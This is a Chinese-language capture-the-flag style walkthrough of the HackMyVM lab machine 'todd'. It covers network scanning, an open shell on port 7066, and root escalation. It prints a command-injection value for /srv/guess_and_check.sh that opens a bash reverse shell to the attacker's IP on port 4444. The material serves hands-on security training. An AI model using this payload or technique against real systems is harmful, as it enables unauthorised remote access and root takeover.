hackmyvm靶机：todd

简介

hackmyvm是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://hackmyvm.eu/

1.在官网搜索你想要的镜像,然后下载

2.下载好后解压得到.ova的文件，右击选择VMware或者Oracle VirtualBox进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth0 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.31.82后使用namp扫描靶机。

nmap 192.168.31.82 -A -O -p-

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

开放22，80，7066端口。其它的端口都没拦截了。

80端口扫完也是给了一些我们经常用的脚本而已。突破口在7066端口，7066端口不知道是什么服务，nc一下

六百六十六，直接给我shell了。又断了。应该是后面那几个程序杀进程了。

写个密钥进去。好登录，反正都会被杀。不写也可以。

把这个kill_todd.sh玩意删了就可以稳定下来了。

六百六十六，只能走/srv/guess_and_check.sh这个脚本提权了。

属于是命令注入了，搞不明白。看别人的过程找到的。

N[$(/bin/bash -i >& /dev/tcp/192.168.31.224/4444 0>&1)]

这个弹回来的直接是root了。